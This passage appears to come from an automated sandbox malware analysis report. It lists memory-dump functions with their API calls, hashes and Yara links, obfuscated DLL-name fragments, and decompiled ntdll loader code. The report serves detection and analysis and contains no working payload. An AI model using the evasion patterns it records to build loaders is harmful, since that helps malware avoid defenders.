                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 307468cf0c0295d4b551c08243001eec6ef5c29e0847e943f972ddbc31d2979b
                                  • Instruction ID: 43c9e77ee4c9f18a96d75787d6faeffdbce1d98bb29a946f4fb490966aba967a
                                  • Opcode Fuzzy Hash: 307468cf0c0295d4b551c08243001eec6ef5c29e0847e943f972ddbc31d2979b
                                  • Instruction Fuzzy Hash: 3F11C445948A8BC3EE04894060510E93F10659B3A1B71CFB6EC0E17E99F2194A3FBBE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564C2D, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 601a8b6ec6e3034df4a7a5c7c9dca8af5f48dbad05395e68280c8f469f23af96
                                  • Instruction ID: 0d8110bc9ddacad18043d6d4cf47558cc72357643272c36c444a58f43b751fb9
                                  • Opcode Fuzzy Hash: 601a8b6ec6e3034df4a7a5c7c9dca8af5f48dbad05395e68280c8f469f23af96
                                  • Instruction Fuzzy Hash: 7B2108715097D6C6DB218F3184453C63FA0BB53350F79869DC88A07A97E2A9882BDBD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564D21, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cc836ed8dcf6bab84f36604793d90562d8b2173ecceca13cdbac7f254ad6bf0f
                                  • Instruction ID: b585340807dfb102b2fc2b3bf79a28d5c32a743415b5d8f4ed83a32acb4d9b83
                                  • Opcode Fuzzy Hash: cc836ed8dcf6bab84f36604793d90562d8b2173ecceca13cdbac7f254ad6bf0f
                                  • Instruction Fuzzy Hash: E001DED1A44E8783ED049441A0475DA3B20A2573A1F76DBB6CC0E17E5AB44D4A3FBAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564CF3, Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d579c48214593000ca2c745a3ef9db19a778d4e5b45a3520d2f1f974291b6046
                                  • Instruction ID: 2b6a978802e1d5d9fd3acfad99e5ff06f265a7c58e2b8e54148787c24f578da7
                                  • Opcode Fuzzy Hash: d579c48214593000ca2c745a3ef9db19a778d4e5b45a3520d2f1f974291b6046
                                  • Instruction Fuzzy Hash: 84016291A4498783ED04944160435D93B1051973A1F76DBB78C0E17E5AB00D8A3F7AE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056713A, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 941b5ed72c143a96a7f85988b0012aa0fe0871d0fa1f2c663e5b0001319870e6
                                  • Instruction ID: 33307d59163805dbe45123d721d89d6288c274d25013ea30449a93871f056824
                                  • Opcode Fuzzy Hash: 941b5ed72c143a96a7f85988b0012aa0fe0871d0fa1f2c663e5b0001319870e6
                                  • Instruction Fuzzy Hash: A601AD5460C64FD3DE14556150A66ED2F007A9A3A8F318F77BC0B57E05B618882BB6E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056717A, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 5d0c6c5245ddfe2fb816db15914ba7a6936a5b1a098a4e5285cf607525b5bd5f
                                  • Instruction ID: 05f27f4179f6c760bf4f93dbe7cc5d8d1544da717510db2265510ca5c04be788
                                  • Opcode Fuzzy Hash: 5d0c6c5245ddfe2fb816db15914ba7a6936a5b1a098a4e5285cf607525b5bd5f
                                  • Instruction Fuzzy Hash: A9F0CD5470C24FC39E04552164A66EE2B00799A3A9B308FB6BC0B17A05F718842BBAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005671AB, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 6c2238fb5e6a3cd4225bfea0b839c4b8c117d1c9026713dd44e022f8ec581e05
                                  • Instruction ID: 4d9d964f8a3dfe4cbbae28282f919a851030c1fef63de8f6c66e4ba291fd8143
                                  • Opcode Fuzzy Hash: 6c2238fb5e6a3cd4225bfea0b839c4b8c117d1c9026713dd44e022f8ec581e05
                                  • Instruction Fuzzy Hash: 88F0F65570C70FC39904551060662EE2B00785B3B9B30CF76BC0B17E05F618842B79E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00567085, Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: dce8d11e5e2f85a51a286724285deb801d47ee0fdfc8d5506822207554041f31
                                  • Instruction ID: d64981595ea8f7e7fb41f90b5aa34f55da7a4705ab0f943d5d17420fa35dbfd1
                                  • Opcode Fuzzy Hash: dce8d11e5e2f85a51a286724285deb801d47ee0fdfc8d5506822207554041f31
                                  • Instruction Fuzzy Hash: 5DF08C6870C30FE69E20262049B87BD1E407F9E76CF304E2BBC6393102DB248488A567
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00567211, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: f244ed7c0e16fc7127d01af283813be9761675e77b01ce0ddc20adbea9f005a1
                                  • Instruction ID: 901fb7a7e6ecea5a8f4ab2a1aa5781bafcea89903305ed4c94aadc3ca1fd4112
                                  • Opcode Fuzzy Hash: f244ed7c0e16fc7127d01af283813be9761675e77b01ce0ddc20adbea9f005a1
                                  • Instruction Fuzzy Hash: A8F0E25560C74BC7DE004A5020611D82F10798B3A5B31CFB2EC0E17E55F618492BBBE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005670B9, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 080623ac332417ca0004cac60f0da065700ebd247e663a0ae06a9bd79e51ca02
                                  • Instruction ID: a4a4622224e6f569c7276306bb45e7255479b5d2c45688ee33e82fb79cdb8699
                                  • Opcode Fuzzy Hash: 080623ac332417ca0004cac60f0da065700ebd247e663a0ae06a9bd79e51ca02
                                  • Instruction Fuzzy Hash: 10F0AF5870C30FE1DE20262049787BD0E407F9E36CF304E27BC2393102DB248488A157
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005671E2, Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 6e39775fa2db7d1aa1b82b1bb7404f2c90b560f0722f6cb48758c5f216ba7989
                                  • Instruction ID: b206fdedb7b0c89cbc2c4c6e1d76dc59ad80e2622e9134e2e6eb397830f21023
                                  • Opcode Fuzzy Hash: 6e39775fa2db7d1aa1b82b1bb7404f2c90b560f0722f6cb48758c5f216ba7989
                                  • Instruction Fuzzy Hash: C9F0A75560C34FD39D04595120752DA2B007D4B7B9B318F76BC0B17E05B618441F76E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056494D, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,005648AF,005649CB,005609BE), ref: 00564989
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: cfea15e5d34b1d27723b731975e4cf2f08aa7c700438b89f932c9e4d263e06bb
                                  • Instruction ID: 800591ae4ef2ce6514794f0fc682782484a9bedfd4618d9abee2ae4d4ac80065
                                  • Opcode Fuzzy Hash: cfea15e5d34b1d27723b731975e4cf2f08aa7c700438b89f932c9e4d263e06bb
                                  • Instruction Fuzzy Hash: B6E0D8A164468683FE14491160417C977116793350F36CBB6DC0F16E55B169443B9AE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00567023, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: db5ffe3252300bd2fb24e7bb40230fad5b38262ee280bbd3587c4d587e50dec1
                                  • Instruction ID: 5d1842fd3ed29190011993d29757b0886c0f7875ddc5df62989185735c90a789
                                  • Opcode Fuzzy Hash: db5ffe3252300bd2fb24e7bb40230fad5b38262ee280bbd3587c4d587e50dec1
                                  • Instruction Fuzzy Hash: 65D0125812D20EA9AB282A714CBCA7F1D08BE49F7DB304A1DFC07535019B1485446471
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564941, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,005648AF,005649CB,005609BE), ref: 00564989
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 6ddf569032205c7d953a59423550f259a0b38fcbf4f9a950a3a1fef9fe071ee2
                                  • Instruction ID: 56210359e7f5a7c635a42f3933129ca2ac159cfac3e37980608c0758c35fde02
                                  • Opcode Fuzzy Hash: 6ddf569032205c7d953a59423550f259a0b38fcbf4f9a950a3a1fef9fe071ee2
                                  • Instruction Fuzzy Hash: 17D012317D9304BAFF7449304C5AF9A22169B81F00F30441EB70B295C142F091A09717
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
                                  • Instruction ID: ee8f6295c3d00ad3366357643f49832a070fdd6ca318626694bc1ea0cc8d5a11
                                  • Opcode Fuzzy Hash: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
                                  • Instruction Fuzzy Hash: 80B09B719014D5C9D611D761460C71B790177D0751F97C2A2D1120641E477CC0D1F6B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00563202, Relevance: 1.3, APIs: 1, Instructions: 60sleepnativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                    • Part of subcall function 00563249: CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: Thread$CreateMemoryProtectSleepTerminateVirtual
                                  • String ID:
                                  • API String ID: 3653683674-0
                                  • Opcode ID: 5bf1341d049502e37df4bcb311e94281aa208b7cc20aeb095f8cb3f5952d219e
                                  • Instruction ID: 82b3d32de220be06d62b822b231943368750f4e5a60bbd47c54950784f94fcf2
                                  • Opcode Fuzzy Hash: 5bf1341d049502e37df4bcb311e94281aa208b7cc20aeb095f8cb3f5952d219e
                                  • Instruction Fuzzy Hash: 4C012D70A44746DBEF149610904A6D83B517F53361FBACB91DC0F07856B218C89B9ED3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056453E, Relevance: 1.3, APIs: 1, Instructions: 48sleepnativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00564657
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectSleepVirtual
                                  • String ID:
                                  • API String ID: 3235210055-0
                                  • Opcode ID: a91a222ae0582da85c4343541aee3112c3ae06df3437de5c8bfc1aa6da8f788a
                                  • Instruction ID: 25941fb44d81c03b6f4f85350f66fada998334d1eb01db580716615f1e345f44
                                  • Opcode Fuzzy Hash: a91a222ae0582da85c4343541aee3112c3ae06df3437de5c8bfc1aa6da8f788a
                                  • Instruction Fuzzy Hash: 9AF04C70A447429BEB044A009089BC43751AB17360FBAC791CC0F0B955F218CCAB9FD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564582, Relevance: 1.3, APIs: 1, Instructions: 39sleepnativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00564657
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectSleepVirtual
                                  • String ID:
                                  • API String ID: 3235210055-0
                                  • Opcode ID: 0bae777d6a7084b2f1103452b20a35abd6664b7aea9680d338ad472484ce0e1f
                                  • Instruction ID: 1fff5e6c38c8866d4e52c99c47dd8dc4785a704e3afad86ef89281bbaabb6fd6
                                  • Opcode Fuzzy Hash: 0bae777d6a7084b2f1103452b20a35abd6664b7aea9680d338ad472484ce0e1f
                                  • Instruction Fuzzy Hash: 99E092A4A84A4BC7DE048900608A9D53751A6573A1BB7CBB2CC0F17E95B158887FAED3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056452B, Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00563249: CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                    • Part of subcall function 00563249: TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                    • Part of subcall function 00563249: NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: Thread$CreateMemoryProtectSleepTerminateVirtual
                                  • String ID:
                                  • API String ID: 3653683674-0
                                  • Opcode ID: 85c08e041a08a3b94d6f2f07aab846c6486cccd950f3343ce6214488f3b73b68
                                  • Instruction ID: 5fd5fc259f1f9f88ce3a0c1f72a82aaf2ad2ba3f7baeb04a84fbf0b9e4c10c6c
                                  • Opcode Fuzzy Hash: 85c08e041a08a3b94d6f2f07aab846c6486cccd950f3343ce6214488f3b73b68
                                  • Instruction Fuzzy Hash: F9F0EC747553059FEB146720C49EB983B92BF96310FDAC545E9070B093D724C8C4DF02
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00082CEC, Relevance: 14.2, Strings: 11, Instructions: 444COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: f3e0b5516f0a347189b25e6c98bc0c13edf583cf6a14c2326c64618a5291d114
                                  • Instruction ID: 718178aefe961bb51f046a846ea2f6bd1605710326d63946e3499191fa7c85b2
                                  • Opcode Fuzzy Hash: f3e0b5516f0a347189b25e6c98bc0c13edf583cf6a14c2326c64618a5291d114
                                  • Instruction Fuzzy Hash: BEF16C70518F488FCBA4EF68C495BEAB7E1FB58300F404A2EA49FC7256DF30A5458B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00082CF2, Relevance: 14.2, Strings: 11, Instructions: 403COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: c755d9650584519df99eb319ef7fca55af0926ae1fa38034151d02ad8170f38c
                                  • Instruction ID: 8c52dc9e7bf1982eee0f91bb859c30ef2008ae6872a9bd9bb8c9c9dd0e430a1a
                                  • Opcode Fuzzy Hash: c755d9650584519df99eb319ef7fca55af0926ae1fa38034151d02ad8170f38c
                                  • Instruction Fuzzy Hash: 8EE14C74518F488FCBA4EF68C4957EAB7E1FB58300F904A2EA1DBC7256DF30A5418B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3D8E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
                                  			E1E3D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e49d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e498464; // 0x76d30110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e495780 & 0x00000003) != 0) {
							E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e495780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E3EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e497984; // 0x832ba0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_push("true");
							_pop(_t46);
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e498464; // 0x76d30110
					 *0x1e49b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E3D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e495780 & 0x00000005) != 0) {
						_push(_t49);
						E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                  0x1e3d8e0f
                                  0x1e3d8e16
                                  0x1e3d8e19
                                  0x1e3d8e1b
                                  0x1e3d8e21
                                  0x1e3d8e7f
                                  0x1e3d8e85
                                  0x1e419354
                                  0x1e41936c
                                  0x1e419371
                                  0x1e41937b
                                  0x1e419381
                                  0x1e419381
                                  0x1e41937b
                                  0x1e3d8e9d
                                  0x1e3d8e9d
                                  0x1e3d8e29
                                  0x1e3d8e2c
                                  0x1e3d8e38
                                  0x1e3d8e3e
                                  0x1e3d8e43
                                  0x1e3d8eb5
                                  0x1e3d8eb9
                                  0x1e4192a8
                                  0x1e4192aa
                                  0x1e4192af
                                  0x1e4192e8
                                  0x1e4192e8
                                  0x1e4192af
                                  0x1e3d8eb9
                                  0x1e3d8e45
                                  0x1e3d8e53
                                  0x1e3d8e5b
                                  0x1e3d8e5f
                                  0x1e3d8e78
                                  0x1e3d8e78
                                  0x1e3d8e7d
                                  0x1e3d8ec3
                                  0x1e3d8ecd
                                  0x1e3d8ed2
                                  0x1e3d8ed2
                                  0x1e3d8ec5
                                  0x1e3d8ec5
                                  0x00000000
                                  0x1e3d8e7d
                                  0x1e3d8e67
                                  0x1e3d8ea4
                                  0x1e41931a
                                  0x00000000
                                  0x00000000
                                  0x1e419320
                                  0x1e3d8ea4
                                  0x1e3d8e70
                                  0x1e419325
                                  0x1e419340
                                  0x1e419345
                                  0x1e419345
                                  0x1e3d8e76
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  Strings
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 1E419357
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 1E41933B, 1E419367
                                  • LdrpFindDllActivationContext, xrefs: 1E419331, 1E41935D
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E41932A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-3779518884
                                  • Opcode ID: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
                                  • Instruction ID: e0526d5ec8df3a5b9409c9e9e0638c28807f8fa09bbff3364ffb9be08153f0c8
                                  • Opcode Fuzzy Hash: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
                                  • Instruction Fuzzy Hash: 4C414A33D003569FDB14AB19CC98A69F2BEBB84204F86476AE90D67150E770FD888FD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E46D616, Relevance: 4.7, APIs: 3, Instructions: 216timeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E1E46D616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x1e49d360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x1e49610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x1e38aef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x1e49610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E1E46C70A(__ecx + 0x38, _t150);
				}
				_t79 = E1E46C5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E1E46A359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x1e49610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L1E3CFAD0(_t159 + 0x34);
					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
